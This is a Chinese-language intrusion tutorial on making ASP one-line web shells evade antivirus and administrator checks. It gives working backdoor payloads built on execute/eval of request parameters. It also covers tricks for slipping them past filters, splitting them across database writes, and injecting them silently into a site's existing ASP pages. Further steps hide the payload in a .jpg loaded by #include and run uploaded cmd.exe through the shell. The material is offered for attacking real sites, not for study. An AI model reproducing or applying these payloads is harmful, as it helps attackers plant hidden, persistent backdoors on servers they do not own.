詳細講解小馬的免殺方法

在入侵過程中，我們常常會遇到這樣的問題，因為大馬太大，而不能上傳，怎麼辦，這個時候就只能用小馬來輔助，但是，小馬的語句又被殺，今天我們來說說一句話小馬的免殺方法 眾所周之，一句話的語句是<%execute request("密碼")%> 1.入侵過程中<%,%>符號被過濾怎麼辦？我們可以想辦法避開<%,%> <scriptlanguage=VBScript runat=server>execute request("cmd")</Script> 2.網路中流傳的最小的木馬代碼是<%eval request("#")%> 如過連這也寫不下怎麼辦？將木馬分開寫就好了！ <%Y=request("x")%> <%execute(Y)%> [code] 這樣分開寫提交到資料庫就沒問題了！ 不過，在ACCESS資料庫中新增加的數據物理位置是在舊數據之前的，所以要先寫<%execute(Y)%>部分。寫好後在客戶端寫密碼時除了填寫"x"以外的任何字元都可以，如果填了"x"就會出錯！ 3.插入一句話容易爆錯，例如 [code] Sub unlockPost() Dim id,replyid,rs,posttable id=Request("id") replyid=Request("replyid") If Not IsNumeric(id) or id="" Then 寫成 Sub unlockPost(<%eval request("#")%>) Dim id,replyid,rs,posttable id=Request("id") replyid=Request("replyid") If Not IsNumeric(id) or id="" Then 就可以了，也可以寫成帶容錯語句的格式！！ <%if request("cmd")<>""then execute request("cmd")%> 4.一句話木馬到兩句話木馬的轉型! 一句話木馬服務端原型：<%execute request("value")%> , 變形後：<%On Error Resume Next execute request("value")%> , 至於為什麼要用兩句話木馬呢,是由於使我們的後門更加隱蔽。 我也試過用一句話插入WellShell的某個asp文件裡面,可是訪問時經常出錯,而插入兩句話木馬服務端卻可以正常訪問了,對站點的頁面無任何影響。 這樣就達到了隱蔽性更強的目的了,他管理員總不會連自己的網頁文件都刪了吧。 現在我的WellShell都有這樣的後門.選擇要插入兩句話木馬的ASP文件要注意,選一些可以用IE訪問的ASP文件,不要選conn.asp這樣的文件來插入。當然,連接兩句話木馬的客戶端仍然是用一句木馬的客戶端，不用修改。 5.一句話免殺： 一：變形法 比如：eval(request("#"))這樣的馬兒呢，一般情況下是不被殺的。但實際上，經常殺毒軟體會把eval(request列為特徵碼。所以我們變形一下 E=request("id") eval(E) 這樣可達到免殺的目的。 例如：<%execute request("1")%>變形後： <%E=request("1") execute E%> 當然，這種變形是最好做的。 介紹第二種方法：因為很多管理員很聰明，它會檢查ASP文件中的execute和eval函數。所以呢，不管你怎麼反編譯，它最終總是要用其中的一個函數 來解釋運行，所以還是被發現了。好么，我們用外部文件來調用。建一個a.jpg或者任何不被發現的文件後綴或文件名。寫入 execute(request("#"))當然，你可以先變形後現放上去。然後在asp文件中插入 <!--#include file="a.jpg" --> 來引用它，即可。 不過，管理員可以通過對比文件的方式找到修改過的文件，不過這種情況不多 6.在WEBSHELL中使用命令提示 在 使用ASP站長助手6.0時點擊命令提示符顯示「沒有許可權」的時候，可以使用asp站長助手上傳CMD.exe到你的WEBSHELL目錄（其它目錄也 行，把上傳以後的CMD.exe絕對路徑COPY出來），再修改你的WEBSHELL找到調用CMD.EXE的代碼。原來的代碼如下 .exec("cmd.exe /c "&DefCmd).stdout.readall 修改為 .exec("你想上傳的cmd.exe絕對路徑" /c"&DefCmd).stdout.readall 比如你上傳到的目錄是D：webwwwcmd.exe,那麼就修改成 .exec("D：webwwwcmd.exe /c"&DefCmd).stdout.readall